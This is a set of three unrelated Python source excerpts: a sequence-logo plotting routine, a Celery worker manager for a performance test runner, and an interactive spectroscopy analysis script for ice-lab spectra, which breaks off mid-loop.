        axes[1].axhline(-p_line, color='red')
        miny, maxy = -p_line, p_line
    else:
        miny, maxy = 0, 0

    # Letters are drawn at x = 1, 2, ... per position.
    x = 1

    yax.xaxis.set_ticks([])
    yax.yaxis.set_ticks([])
    xax.yaxis.set_ticks([])
    xax.spines['bottom'].set_position(('data', 0))
    xax.set_ylim(bottom=-2, top=2.4)

    # NOTE(review): this loop rebinds the name `ax` (the parameter); the
    # parameter is not used again afterwards, so behavior is unaffected.
    for ax in (yax, xax) + axes:
        ax.spines['top'].set_color('none')
        ax.spines['bottom'].set_color('none')
        ax.spines['left'].set_color('none')
        ax.spines['right'].set_color('none')

    if show_title:
        yax.set_title(title)

    xax.set_xticks(
        range(0, length),
    )
    # NOTE(review): this window-extent-based offset is computed and then
    # immediately overridden by the constant on the next statement; it is
    # dead code kept for reference.
    y_offset = (
        76 * np.power(xax.get_window_extent().height, -1.453)
    ) - .4
    y_offset = -.15
    # Position labels run from -(length-1)/2 to +(length-1)/2 around 0.
    xax.set_xticklabels(
        [
            '{:+d}'.format(i) if i != 0 else '0'
            for i in range(-(length - 1) // 2, (length - 1) // 2 + 1)
        ],
        va='center',
        ha='center',
        y=y_offset,
        fontsize=8,
    )

    for i in range(0, length):
        base_scores = [(b, scores[b][i]) for b in BASES]
        # Order: depleted residues (most negative outermost), then enriched
        # residues (largest on top after stacking).
        base_scores = (
            sorted([i for i in base_scores if i[1] < 0], key=lambda t: -t[1]) +
            sorted([i for i in base_scores if i[1] >= 0], key=lambda t: -t[1])
        )
        # Drop residues below the low-resolution cutoff.
        base_scores = [
            i
            for i in base_scores
            if abs(i[1]) >= (p_line or 0) * low_res_cutoff
        ]
        # Start stacking at the bottom of the depleted stack.
        y = sum(i[1] for i in base_scores if i[1] < 0)
        miny = min(miny, y)

        for base, score in base_scores:
            _letterAt(
                base, x, y,
                # Fade letters whose score is below the significance line.
                alpha=min([1, abs(score / (p_line or 1))]) ** fade_power,
                xscale=1.2,
                yscale=abs(score),
                ax=axes[1 if score < 0 else 0],
            )
            y += abs(score)

        x += 1
        maxy = max(maxy, y)

    # Symmetric y-range unless the caller pinned one.
    if minmaxy is None:
        minmaxy = max(abs(i) for i in [miny, maxy])

    for ind, ax in enumerate(axes):
        ax.set_xlim(
            left=.5,
            right=x - .5,
        )
        # Top panel spans [0, minmaxy], bottom panel [-minmaxy, 0].
        ax.set_ylim(
            bottom=-1.05 * minmaxy if ind == 1 else 0,
            top=1.05 * minmaxy if ind == 0 else 0,
        )
        ax.set_xticks([])

        # Tick spacing: thirds of the range, keeping only ticks beyond the
        # significance line; fall back to unit ticks for small ranges.
        spacing = minmaxy // 3

        if spacing != 0:
            ax.set_yticks(
                [
                    i
                    for i in np.arange(
                        spacing if ind == 0 else -spacing,
                        (spacing + 1) * (3 if ind == 0 else -3),
                        spacing * (1 if ind == 0 else -1)
                    )
                    if abs(i) >= abs(p_line)
                ],
            )
        else:
            ax.set_yticks(
                np.arange(
                    0,
                    minmaxy if ind == 0 else -minmaxy,
                    1 if ind == 0 else -1,
                )
            )

        ax.set_yticklabels(
            ax.get_yticks(),
        )

    if show_ylabel:
        yax.set_ylabel(
            ytitle,
        )

    return (yax, xax,) + axes, minmaxy
def logo(
    fore, back,
    ax=None,
    title='',
    width=12,
    height=8,
    p=0.05,
    fade_power=1,
    low_res_cutoff=0,
    prob_fn=None,
    show_title=True,
    show_ylabel=True,
    show_n=True,
    minmaxy=None,
):
    '''
    Generate a sequence logo locally using pLogo's enrichment score.

    Parameters
    ----------
    fore : list of str
    back : list of str
        Foreground and background n-mers; all must share one length.
    title : str, optional
    p : float, optional
        p-value to use for residue significance cutoff. This value is
        corrected for multiple-hypothesis testing before being used.
    fade_power : float, optional
        Set transparency of residues with scores below p to:
        (score / p) ** fade_power.
    low_res_cutoff : float, optional
        Hide residues with scores below p * low_res_cutoff.
    prob_fn : str, optional
        Probability function to use for calculating enrichment. Either
        'hypergeom' or 'binom'. The default, hypergeom, is more accurate but
        more computationally expensive.

    Returns
    -------
    fig : :class:`matplotlib.figure.Figure`
    axes : :class:`matplotlib.axes.Axes`
    '''
    if not back:
        return None, None

    seq_len = len(back[0])
    assert seq_len > 0
    # Every sequence, foreground and background, must have the same length.
    assert all(len(seq) == seq_len for seq in fore)
    assert all(len(seq) == seq_len for seq in back)

    scores, p_line = _calc_scores(
        BASES, fore, back,
        p=p,
        prob_fn=prob_fn,
    )

    if ax is None:
        _, ax = plt.subplots(figsize=(width / 2, height / 2))

    ax.axis('off')

    axes, minmaxy = _draw_logo(
        scores=scores,
        p_line=p_line,
        title=title,
        ytitle='log odds',
        width=width,
        height=height,
        fade_power=fade_power,
        low_res_cutoff=low_res_cutoff,
        show_title=show_title,
        show_ylabel=show_ylabel,
        ax=ax,
        minmaxy=minmaxy,
    )

    if show_n:
        # Annotate foreground/background sizes in the lower-right corner.
        axes[3].text(
            seq_len + .4,
            -minmaxy,
            'n(fg) = {}\nn(bg) = {}'.format(len(fore), len(back)),
            color='darkred',
            fontsize=18,
            ha='right',
            va='bottom',
        )

    return ax.get_figure(), axes
| |
import os
import signal
import sys
import time
from itertools import cycle
from typing import Callable
from celery import Celery
from sqlalchemy import create_engine
from logger import logger
from perfrunner import celerylocal, celeryremote
from perfrunner.helpers import local
from perfrunner.helpers.remote import RemoteHelper
from perfrunner.settings import (
ClusterSpec,
PhaseSettings,
TargetIterator,
TestConfig,
)
from perfrunner.workloads import spring_workload
from perfrunner.workloads.jts import jts_run, jts_warmup
from perfrunner.workloads.pillowfight import (
pillowfight_data_load,
pillowfight_workload,
)
from perfrunner.workloads.ycsb import ycsb_data_load, ycsb_workload
# Celery application shared by all worker tasks below.
celery = Celery('workers')

if '--remote' in sys.argv or '-C' in sys.argv:
    # -C flag is a hack to distinguish local and remote workers!
    celery.config_from_object(celeryremote)
else:
    celery.config_from_object(celerylocal)


# Thin Celery task wrappers: each forwards its positional arguments verbatim
# to the corresponding workload function.

@celery.task
def spring_task(*args):
    """Celery task: run the spring workload generator."""
    spring_workload(*args)


@celery.task
def pillowfight_data_load_task(*args):
    """Celery task: load data using pillowfight."""
    pillowfight_data_load(*args)


@celery.task
def pillowfight_task(*args):
    """Celery task: run the pillowfight workload."""
    pillowfight_workload(*args)


@celery.task
def ycsb_data_load_task(*args):
    """Celery task: load data using YCSB."""
    ycsb_data_load(*args)


@celery.task
def ycsb_task(*args):
    """Celery task: run the YCSB workload."""
    ycsb_workload(*args)


@celery.task
def jts_run_task(*args):
    """Celery task: run the JTS workload."""
    jts_run(*args)


@celery.task
def jts_warmup_task(*args):
    """Celery task: warm up before a JTS run."""
    jts_warmup(*args)
class WorkerManager:
    """Factory that picks the remote or local worker manager at runtime."""

    def __new__(cls, *args, **kwargs):
        # Remote mode is selected via the --remote command line flag.
        manager_cls = (
            RemoteWorkerManager if '--remote' in sys.argv
            else LocalWorkerManager
        )
        return manager_cls(*args, **kwargs)
class RemoteWorkerManager:
    """Manages Celery workers running on remote client machines."""

    # Checkout directory on each remote client.
    WORKER_HOME = '/tmp/perfrunner'

    # Seconds between readiness pings.
    PING_INTERVAL = 1

    def __init__(self, cluster_spec: ClusterSpec, test_config: TestConfig,
                 verbose: bool):
        self.cluster_spec = cluster_spec
        self.test_config = test_config
        self.remote = RemoteHelper(cluster_spec, verbose)
        self.workers = cycle(self.cluster_spec.workers)
        # Clean slate, then bring the workers up and block until ready.
        self.terminate()
        self.start()
        self.wait_until_workers_are_ready()

    @property
    def is_remote(self) -> bool:
        return True

    def next_worker(self) -> str:
        """Return the next worker host in round-robin order."""
        return next(self.workers)

    def reset_workers(self):
        """Restart the round-robin iteration from the first worker."""
        self.workers = cycle(self.cluster_spec.workers)

    def start(self):
        """Set up the remote repo and launch one Celery worker per host."""
        logger.info('Initializing remote worker environment')
        self.remote.init_repo(self.WORKER_HOME)

        perfrunner_home = os.path.join(self.WORKER_HOME, 'perfrunner')
        for worker in self.cluster_spec.workers:
            logger.info('Starting remote Celery worker, host={}'.format(worker))
            self.remote.start_celery_worker(worker, perfrunner_home)

    def wait_until_workers_are_ready(self):
        """Block until every remote worker answers a Celery ping."""
        expected = ['celery@{}'.format(worker)
                    for worker in self.cluster_spec.workers]
        while len(celery.control.ping(expected)) != len(expected):
            time.sleep(self.PING_INTERVAL)
        logger.info('All remote Celery workers are ready')

    def run_tasks(self,
                  task: Callable,
                  task_settings: PhaseSettings,
                  target_iterator: TargetIterator,
                  timer: int = None):
        """Fan out `task` over all targets and workload instances."""
        if self.test_config.test_case.reset_workers:
            self.reset_workers()

        self.async_results = []
        for target in target_iterator:
            for instance in range(task_settings.workload_instances):
                worker = self.next_worker()
                logger.info('Running the task on {}'.format(worker))
                result = task.apply_async(
                    args=(task_settings, target, timer, instance),
                    queue=worker, expires=timer,
                )
                self.async_results.append(result)

    def wait_for_workers(self):
        """Block until every dispatched task has finished."""
        logger.info('Waiting for all tasks to finish')
        for result in self.async_results:
            result.get()
        logger.info('All tasks are done')

    def download_celery_logs(self):
        """Fetch worker logs from the remote clients into ./celery."""
        if not os.path.exists('celery'):
            os.mkdir('celery')
        self.remote.get_celery_logs(self.WORKER_HOME)

    def abort(self):
        # Remote runs have no abort mechanism.
        pass

    def terminate(self):
        """Kill any leftover client processes on the remote machines."""
        logger.info('Terminating Celery workers')
        self.remote.terminate_client_processes()
class LocalWorkerManager(RemoteWorkerManager):
    """Manages a single Celery worker running on localhost, backed by
    SQLite-based broker and result databases."""

    BROKER_DB = 'perfrunner.db'
    RESULTS_DB = 'results.db'

    def __init__(self, cluster_spec: ClusterSpec, test_config: TestConfig,
                 verbose: bool):
        self.cluster_spec = cluster_spec
        self.test_config = test_config
        # Clean slate, tune the SQLite DBs, then start and wait for readiness.
        self.terminate()
        self.tune_sqlite()
        self.start()
        self.wait_until_workers_are_ready()

    @property
    def is_remote(self) -> bool:
        return False

    def next_worker(self) -> str:
        # There is only one local worker/queue.
        return 'localhost'

    def tune_sqlite(self):
        """Disable fsync on the throwaway broker/result databases for speed."""
        for db in self.BROKER_DB, self.RESULTS_DB:
            engine = create_engine('sqlite:///{}'.format(db))
            engine.execute('PRAGMA synchronous=OFF;')

    def wait_until_workers_are_ready(self):
        """Poll the broker DB until the local worker's queue appears."""
        engine = create_engine('sqlite:///{}'.format(self.BROKER_DB))
        query = 'SELECT COUNT(*) FROM kombu_queue WHERE name = "{}"'\
            .format(self.next_worker())

        while True:
            if 'kombu_queue' in engine.table_names():
                for count, in engine.execute(query):
                    if count:
                        logger.info('Local Celery worker is ready')
                        return
            # Bug fix: the original loop polled without any delay, spinning a
            # CPU core at 100% until the worker was up. Sleep between polls,
            # mirroring the remote manager's ping interval.
            time.sleep(self.PING_INTERVAL)

    def start(self):
        """Start the local Celery worker process."""
        logger.info('Starting local Celery worker')
        local.start_celery_worker(queue=self.next_worker())

    def download_celery_logs(self):
        # Logs are already local; nothing to download.
        pass

    @property
    def pid(self) -> int:
        """Read the worker's PID from the pid file it writes on startup."""
        with open('worker.pid') as f:
            return int(f.read())

    def abort(self):
        """Interrupt the worker and wait for in-flight tasks to unwind."""
        logger.info('Interrupting Celery workers')
        # NOTE(review): SIGPWR is Linux-only; this manager assumes a Linux
        # client machine.
        os.kill(self.pid, signal.SIGPWR)
        self.wait_for_workers()

    def terminate(self):
        """Kill any leftover local Celery processes."""
        logger.info('Terminating Celery workers')
        local.kill_process('celery')
| |
##############################################################################
# Created by Garrett Thompson
# Graphical User Interface for Data Analysis
# Created at Northern Arizona University
# for use in the Astrophysical Ice Laboratory
# Advisors: Jennifer Hanley, Will Grundy, Henry Roe
# garrett.leland.thompson@gmail.com
##############################################################################
import os
import csv
import time
import warnings
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit as cf
from scipy.fftpack import fft, fftfreq, ifft
from scipy.signal import savgol_filter as sgf
from scipy.integrate import trapz
def main():
    """Interactive entry point: choose a save directory and input spectra,
    inspect the raw plots, then smooth the data with either a Savitzky-Golay
    filter or an interactive FFT filter."""
    folder_to_save = choose_dir()
    #choose files for analysis
    raw_x,raw_y, raw_xbg,raw_ybg = choose_files(folder_to_save)
    print("Plotting imported data...")
    plotting_data_for_inspection(raw_x,raw_y,'Raw Data','Wavenumber (cm-1)','% Transmittance','rawspectrum.pdf',folder_to_save, False)
    plotting_data_for_inspection(raw_xbg,raw_ybg,'Raw Background','Wavenumber (cm-1)','% Transmittance','rawbackground.pdf',folder_to_save, False)
    #user chooses method after inspecting plots
    user_method = str(input('Press "s" for savitsky-golay filter, or "f" for fft filter\n:'))
    choosing = True
    while choosing:
        if user_method.lower() == 's':
            # savitsky-golay option was chosen
            choosing = False
            args_list = [folder_to_save, raw_y, raw_ybg, raw_x]
            raw_x, norm_smooth = sgf_calc(args_list)
            plot_data(raw_x,norm_smooth,folder_to_save)
        elif user_method.lower() == 'f':
            # fft option was chosen
            choosing = False
            frq_x,frq_xbg,fft_y,fft_ybg = fft_calculation(raw_x,raw_y,raw_xbg,raw_ybg,folder_to_save)
            plot_figure, plot_axis = plotting_data_for_inspection(frq_x,np.log(abs(fft_ybg)),'FFT of raw bg','Cycles/Wavenumber (cm)','Log(Power/Frequency)','fft_background.pdf',folder_to_save, False)
            filt_y = fft_y.copy()
            filt_ybg = fft_ybg.copy()
            input('Zoom to liking, then press enter to start')
            print('Left to add, middle to remove nearest, and right to finish')
            # global frq_cid
            vert_lines=[]
            frq_cid = plot_figure.canvas.mpl_connect('button_press_event',lambda event: freq_click(event, [frq_x,fft_ybg,plot_figure,plot_axis,vert_lines,filt_y,filt_ybg,folder_to_save,raw_x]))
            plt.show()
            plot_figure.canvas.mpl_disconnect(frq_cid)
            # vert_lines, frq_x, filt_y, filt_ybg = args_dict["vert_lines"],args_dict["frq_x"],args_dict["filt_y"],args_dict["filt_ybg"]
        else:
            # Bug fix: any input other than 's'/'f' previously re-tested the
            # same unchanged string forever (infinite busy loop with no
            # prompt). Re-prompt the user instead.
            user_method = str(input('Press "s" for savitsky-golay filter, or "f" for fft filter\n:'))
def save_as_csv(folder_to_save, title, column1_title, column2_title, column1_data, column2_data):
    """Write two parallel data columns to CSV file *title* inside *folder_to_save*.

    Parameters
    ----------
    folder_to_save : str
        Directory (relative to the cwd) the file is written into; the cwd is
        restored afterwards via os.chdir('..').
    title : str
        File name of the CSV to create/overwrite.
    column1_title, column2_title : str
        Header labels for the two columns.
    column1_data, column2_data : sequence
        Parallel sequences; rows stop at the shorter of the two (zip).
    """
    os.chdir(folder_to_save)
    # newline='' is required by the csv module on Python 3; without it the
    # writer emits spurious blank rows on Windows.
    with open(title, "w", newline="") as f:
        writer = csv.writer(f)
        writer.writerow([column1_title, column2_title])
        writer.writerows(zip(column1_data, column2_data))
    os.chdir('..')
def fft_calculation(raw_x, raw_y, raw_xbg, raw_ybg, folder_to_save):
    """Fourier-transform the spectrum and its background.

    Returns (frq_x, frq_xbg, fft_y, fft_ybg): the frequency axes plus the
    (complex) FFTs of both signals.  Also records the background power
    spectrum to "FFT_Raw_bg_data.csv" for later inspection.
    """
    # transform both signals into the frequency domain
    fft_y = fft(raw_y)
    fft_ybg = fft(raw_ybg)
    # sample spacing = spanned x-range divided by the number of points
    spacing = (max(raw_x) - min(raw_x)) / len(fft_y)
    spacing_bg = (max(raw_xbg) - min(raw_xbg)) / len(fft_ybg)
    frq_x = fftfreq(len(fft_y), spacing)
    frq_xbg = fftfreq(len(fft_ybg), spacing_bg)
    save_as_csv(folder_to_save, "FFT_Raw_bg_data.csv",
                "frq_x", "log(abs(fft_bg))",
                frq_x, np.log(abs(fft_ybg)))
    return frq_x, frq_xbg, fft_y, fft_ybg
def choose_dir():
    """
    User chooses where all work will be saved; a time-stamp file is dropped
    into the new directory for future reference.  Returns the directory name.
    """
    # All work to follow is saved under this user-named directory.
    folder_to_save = input('Type name of directory to save all data being created\n:')
    os.mkdir(folder_to_save)
    os.chdir(folder_to_save)
    # Record when this run happened, then return to the parent directory.
    run_stamp = time.strftime("%Y-%m-%d %H:%M")
    with open("time_created.txt", "w") as text_file:
        text_file.write("Time this program was run: {} \n".format(run_stamp))
    os.chdir('..')
    return folder_to_save
def plotting_data_for_inspection(xdata, ydata, plot_title, plot_xlabel, plot_ylabel, filename_for_saving, folder_to_save, block_boolean):
    """
    Plots data for user to look at within program and saves the figure.

    parameters
    ----------
    xdata,ydata: x and y data to be plotted
    plot_title: title drawn above the axes
    plot_xlabel,plot_ylabel: label x and y axes in plot
    filename_for_saving: file name the figure is saved under (inside
        folder_to_save) for later reference
    block_boolean: True or False, tells if program waits for figure to close

    returns
    -------
    (figure, axes) pair of the created matplotlib plot
    """
    plot_figure, plot_axis = plt.subplots()
    plt.plot(xdata, ydata, color='blue')
    plt.xlabel(plot_xlabel)
    plt.ylabel(plot_ylabel)
    plt.suptitle(plot_title)
    # show first (non-blocking unless requested), then save from inside the
    # target directory so the file lands next to the rest of the run's output
    plt.show(block=block_boolean)
    os.chdir(folder_to_save)
    plt.savefig(filename_for_saving)
    os.chdir('..')
    return plot_figure, plot_axis
def choose_files(folder_to_save):
    """
    Lets user determine which files will be imported for analysis
    and saves preferences for reference later on.

    Prompts for the raw-data CSV, the background CSV, and the mixture's
    concentration and temperature; the latter two are stored as small text
    files in *folder_to_save* so later plotting steps can read them back.
    Returns (raw_x, raw_y, raw_xbg, raw_ybg).
    """
    raw_import = str(input('Enter a raw dataset for analysis\n:'))
    print("\nGot it! Importing now... \n")
    raw_x, raw_y = import_data(raw_import)
    bg_import = str(input('Enter a raw background for analysis\n:'))
    print("\nGot it! Importing now... \n")
    raw_xbg, raw_ybg = import_data(bg_import)
    os.chdir(folder_to_save)
    # record which input files produced this run
    with open("data_files_used.txt", "w") as text_file:
        text_file.write("Raw data file used: {} \n".format(raw_import))
        text_file.write("Raw background data file used: {}".format(bg_import))
    concentration = str(input('Enter concentration of mixture\n:'))
    # saving text file of concentration for later use in plotting
    with open("concentration.txt", "w") as f:
        f.write(concentration)
    temperature = str(input('Enter temperature of mixture\n:'))
    # saving text file of temperature for later use in plotting
    with open("temperature.txt", "w") as f:
        f.write(temperature)
    os.chdir('..')
    return raw_x, raw_y, raw_xbg, raw_ybg
# assumes a csv file, as all data stored from ice lab is in CSV format
def import_data(filename):
    """Load a two-column CSV file and return its columns as numpy arrays.

    Parameters
    ----------
    filename : str
        Path to a comma-separated file with at least two numeric columns.

    Returns
    -------
    (ndarray, ndarray)
        The first and second columns of the file.
    """
    # Pass the path straight to loadtxt: the previous open(filename, "rb")
    # handle was never closed (resource leak); loadtxt opens and closes
    # the file itself when given a path.
    raw_data = np.loadtxt(filename, delimiter=",")
    xdat = raw_data[:, 0]
    ydat = raw_data[:, 1]
    return xdat, ydat
def freq_click(event, args_list):
    """Mouse handler for picking the FFT frequency window.

    Left click  : add a vertical marker at the clicked frequency.
    Middle click: remove the marker closest to the click.
    Right click : save figure + marker list, zero the chosen frequency window
                  out of the FFTs via window_filter(), then continue the
                  pipeline with fft_calc().

    args_list unpacks to (frq_x, fft_ybg, plot_figure, plot_axis, vert_lines,
    filt_y, filt_ybg, folder_to_save, raw_x); vert_lines is mutated in place.
    """
    # add clicked data points to list
    frq_x, fft_ybg, plot_figure, plot_axis, vert_lines, filt_y, filt_ybg, folder_to_save, raw_x = args_list
    plt.xlim(plt.gca().get_xlim())
    plt.ylim(plt.gca().get_ylim())
    if event.button == 1:
        vert_lines.append(event.xdata)
        plot_axis.plot(frq_x, np.log(np.abs(fft_ybg)), color='blue')
        #plt.axvline(x=vert_lines[-1],color='black')
        for val in vert_lines:
            plt.axvline(x=val, color='black')
        plt.xlabel('Cycles/Wavenumber')
        plt.ylabel('Relative Intensity')
        # draws points as they are added
        plt.draw()
    if event.button == 2:
        # middle click, remove closest vertical line
        print('pop!')
        # gets x,y limits of graph, saves them before destroying figure
        xlims = plt.gca().get_xlim()
        ylims = plt.gca().get_ylim()
        # clears axes, to get rid of old scatter points
        plot_axis.cla()
        # re-plots spectrum
        plot_axis.plot(frq_x, np.log(np.abs(fft_ybg)), color='blue')
        # sets axes limits to original values
        plt.xlim(xlims)
        plt.ylim(ylims)
        plt.xlabel('Cycles/Wavenumber')
        plt.ylabel('Relative Intensity')
        # deletes point closest to mouse click
        # BUG FIX: vert_lines is a plain list; subtracting a float from it
        # raised TypeError. Convert to an array before the distance search.
        xindx = np.abs(np.asarray(vert_lines) - event.xdata).argmin()
        del vert_lines[xindx]
        for line in vert_lines:
            plt.axvline(x=line, color='black')
        # draws the new set of vertical lines
        plt.draw()
    if event.button == 3:
        # right click, ends clicking awareness
        # plot_figure.canvas.mpl_disconnect(frq_cid)
        os.chdir(folder_to_save)
        plt.savefig('FFT_filter.pdf')
        with open("freq_window.csv", "w") as f:
            writer = csv.writer(f)
            writer.writerow(["Xposition of vert. line"])
            writer.writerows(list(zip(vert_lines)))
        os.chdir('..')
        # first window
        args_dict = {"vert_lines": vert_lines, "frq_x": frq_x, "filt_y": filt_y, "filt_ybg": filt_ybg}
        plt.close("all")
        argslist = [vert_lines, frq_x, filt_y, filt_ybg]
        filt_y, filt_ybg = window_filter(argslist)
        fft_calc(filt_y, filt_ybg, raw_x, folder_to_save)
def fft_calc(filt_y, filt_ybg, raw_x, folder_to_save):
    """Inverse-transform the filtered FFTs, normalise the spectrum by its
    background, persist the result, and start the continuum-fit stage."""
    # back to the wavenumber domain; the ratio divides out the background
    normalized = ifft(filt_y) / ifft(filt_ybg)
    save_as_csv(folder_to_save, "fft_data.csv", "raw_x", "fft_filt",
                raw_x, normalized.real)
    plot_data(raw_x, normalized.real, folder_to_save)
def sgf_calc(args_list):
    """Savitzky-Golay smoothing of the spectrum and its background.

    args_list unpacks to (folder_to_save, raw_y, raw_ybg, raw_x).  Prompts
    the user for the filter's window size and polynomial order, records both
    choices plus the smoothed/normalised result inside folder_to_save, and
    returns (raw_x, norm_smooth).
    """
    folder_to_save, raw_y, raw_ybg, raw_x = args_list
    # warning when using sgf option
    warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
    window_param = int(input('Input window box size (must be odd number)\n:'))
    poly_param = int(input('Input polynomial order for smoothing\n:'))
    # saving parameters chosen for future inspection
    os.chdir(folder_to_save)
    with open("sgf_params.txt", "w") as sgf_file:
        sgf_file.write("Window parameter used: {} \n".format(window_param))
        sgf_file.write("Polynomial paramter used: {}".format(poly_param))
    #global norm_smooth
    # NOTE(review): delta evaluates to abs(raw_y)[1] - raw_y[0]; a sample
    # spacing would normally come from the x axis (e.g. raw_x[1] - raw_x[0]).
    # This looks like a misplaced parenthesis -- confirm before changing.
    smoothed_y = sgf(raw_y, window_param, poly_param, delta=(abs(raw_y)[1]-raw_y)[0])
    smoothed_ybg = sgf(raw_ybg, window_param, poly_param, delta=(abs(raw_ybg)[1]-raw_ybg)[0])
    # dividing filtered y data from filtered bg data
    norm_smooth = smoothed_y / smoothed_ybg
    rows = list(zip(raw_x, norm_smooth))
    with open("sgf_data.csv", "w") as f:
        writer = csv.writer(f)
        writer.writerow(["window", "polynomail order"])
        writer.writerow([window_param, poly_param])
        writer.writerow(["raw_x", "sgf_filt"])
        writer.writerows(rows)
    os.chdir('..')
    return raw_x, norm_smooth
# band of frequencies to cut out of the FFTs
def window_filter(args_list):
    """Zero out FFT bins whose frequency lies in the user-picked band.

    args_list unpacks to (vert_lines, frq_x, filt_y, filt_ybg).  The last two
    clicked lines delimit [window_min, window_max]; that band and its mirror
    image on the negative-frequency side are blanked, in place, in both the
    signal and the background FFT arrays.  Returns the (mutated) pair.
    """
    vert_lines, frq_x, filt_y, filt_ybg = args_list
    window_min, window_max = vert_lines[-2], vert_lines[-1]
    for idx, freq in enumerate(frq_x):
        inside_positive = window_min <= freq <= window_max
        inside_negative = -window_max < freq < -window_min
        if inside_positive or inside_negative:
            filt_y[idx] = 0
            filt_ybg[idx] = 0
    return filt_y, filt_ybg
def plot_data(x, y, folder_to_save):
    """Show the divided/filtered spectrum and start the interactive
    continuum fit: every mouse click is routed to onclick() until the
    user right-clicks to finish."""
    plot_figure, plot_axis = plotting_data_for_inspection(x, y, "Divide and Filtered Spectrum", "Wavenumber cm-1", "Relative Intensity", "dv_filt_spectrum.pdf", folder_to_save, False)
    order = int(input('Zoom to liking and then enter what order polynomial for continuum fit\n:'))
    xcoords, ycoords = [], []
    # tells python to turn on awareness for button presses
    # (cid is global so onclick() can disconnect the handler on right click)
    global cid
    cid = plot_figure.canvas.mpl_connect('button_press_event', lambda event: onclick(event, [xcoords, ycoords, plot_figure, plot_axis, order, folder_to_save, x, y]))
    print('Left to add, middle to remove nearest, and right to finish')
    plt.show()
# for creating continuum fit to divide out
def onclick(event, argslist):
    """Mouse handler for building the continuum polynomial fit.

    Left click  : add an anchor point, refit the polynomial, redraw.
    Middle click: remove the anchor point nearest the click and refit.
    Right click : disconnect the handler, save the figure and the polynomial
                  coefficients, then continue with calc_coeffs().

    argslist unpacks to (xcoords, ycoords, plot_figure, plot_axis, order,
    folder_to_save, x, y); the fitted np.poly1d is published via global pvals.
    """
    xcoords, ycoords, plot_figure, plot_axis, order, folder_to_save, x, y = argslist
    global pvals
    if event.button == 1:
        # left click
        plt.xlim(plt.gca().get_xlim())
        plt.ylim(plt.gca().get_ylim())
        #plt.cla()
        try:
            # only delete if curve_fit line already drawn
            if len(plot_axis.lines) != 1:
                plot_axis.lines.remove(plot_axis.lines[-1])
        except Exception:
            # BUG FIX: the original read "except: UnboundLocalError" -- a bare
            # except whose body merely evaluated the exception class.  Keep the
            # best-effort behaviour (nothing to remove yet) but make it explicit.
            pass
        # add clicked data points to list
        xcoords.append(event.xdata)
        ycoords.append(event.ydata)
        plot_axis.scatter(xcoords, ycoords, color='black')
        plt.xlabel('Wavenumber cm-1')
        plt.ylabel('Relative Intensity')
        plt.draw()
        xvals = np.array(xcoords)
        yvals = np.array(ycoords)
        # fits values to polynomial, rankwarning is irrelevant
        warnings.simplefilter('ignore', np.RankWarning)
        p_fit = np.polyfit(xvals, yvals, order)
        pvals = np.poly1d(p_fit)
        plot_axis.plot(x, pvals(x), color='black')
        plt.draw()
        # plt.show(block=False)
    if event.button == 2:
        # middle click, remove closest point to click
        print('pop!')
        # gets x,y limits of graph, saves them before destroying figure
        xlims = plt.gca().get_xlim()
        ylims = plt.gca().get_ylim()
        # clears axes, to get rid of old scatter points
        plot_axis.cla()
        # re-plots spectrum
        plot_axis.plot(x, y)
        # sets axes limits to original values
        plt.xlim(xlims)
        plt.ylim(ylims)
        plt.xlabel('Wavenumber cm-1')
        plt.ylabel('Relative Intensity')
        # deletes point closest to mouse click
        # BUG FIX: xcoords/ycoords are plain lists; "list - float" raised
        # TypeError.  Convert to arrays before the nearest-point search.
        xindx = np.abs(np.asarray(xcoords) - event.xdata).argmin()
        del xcoords[xindx]
        yindx = np.abs(np.asarray(ycoords) - event.ydata).argmin()
        del ycoords[yindx]
        # NOTE(review): x and y are deleted by independent nearest searches,
        # which can split a coordinate pair -- confirm this is intended.
        # draws the new set of scatter points, and colors them
        plot_axis.scatter(xcoords, ycoords, color='black')
        plt.draw()
        xvals = np.array(xcoords)
        yvals = np.array(ycoords)
        # fits values to polynomial, rankwarning is ignored
        warnings.simplefilter('ignore', np.RankWarning)
        p_fit = np.polyfit(xvals, yvals, order)
        pvals = np.poly1d(p_fit)
        plot_axis.plot(x, pvals(x), color='black')
        plt.draw()
    if event.button == 3:
        # right click, ends clicking awareness
        plot_figure.canvas.mpl_disconnect(cid)
        os.chdir(folder_to_save)
        plt.savefig('continuum_chosen.pdf')
        # Saving polynomial eqn used in continuum divide for reference
        with open("continuum_polynomial.txt", "w") as save_file:
            save_file.write("%s *x^ %d " % (pvals[0], 0))
            for i in (range(len(pvals))):
                save_file.write("+ %s *x^ %d " % (pvals[i+1], i+1))
        os.chdir('..')
        calc_coeffs(pvals, x, y, folder_to_save)
def calc_coeffs(pvals, x, y, folder_to_save):
    """Final stage: flatten the continuum, convert to absorption
    coefficients, integrate the two peaks of interest, save everything,
    then wait for the user's confirmation and terminate the program.

    Parameters
    ----------
    pvals : np.poly1d
        Continuum polynomial fitted interactively in onclick().
    x, y : arrays
        Wavenumber axis and (filtered) relative intensity.
    folder_to_save : str
        Output directory for the plots, CSVs and peak-area text files.
    """
    fit_y = pvals(x)
    # flattens the continuum
    new_continuum = y / fit_y
    thickness = int(input('\nEnter thickness of cell in cm\n:'))
    # 2 cm thickness for our work in 2016
    # remove runtime errors when taking negative log and dividing
    err_settings = np.seterr(invalid='ignore')
    alpha_coeffs = -np.log(new_continuum) / thickness
    plotting_data_for_inspection(x, alpha_coeffs, "Alpha Coefficients", "Wavenumber cm-1", "Absorption cm-1", "alpha_coeffs.pdf", folder_to_save, False)
    save_as_csv(folder_to_save, "alpha_coeffs.csv", "x", "alpha", x, alpha_coeffs)
    # creating masks around each peak
    x_mask1 = x[(x > 10000) & (x < 10500)]
    x_mask2 = x[(x > 11200) & (x < 12000)]
    y_mask1 = alpha_coeffs[(x > 10000) & (x < 10500)]
    y_mask2 = alpha_coeffs[(x > 11200) & (x < 12000)]
    # writing data for plotting later
    save_as_csv(folder_to_save, "10000_peak.csv", "x", "y", x_mask1, y_mask1)
    save_as_csv(folder_to_save, "11200_peak.csv", "x", "y", x_mask2, y_mask2)
    # integrated area calcs
    area10000 = trapz(y_mask1, x_mask1)
    area11200 = trapz(y_mask2, x_mask2)
    os.chdir(folder_to_save)
    with open("10000area.txt", "w") as f:
        f.write(str(area10000))
    with open("11200area.txt", "w") as f:
        f.write(str(area11200))
    os.chdir('..')
    # BUG FIX: the original read the prompt once and then spun forever in
    # "while check" whenever the answer was not "y"; re-prompt until it is.
    finish_prog = input("Press 'y' when finished\n:")
    while finish_prog != "y":
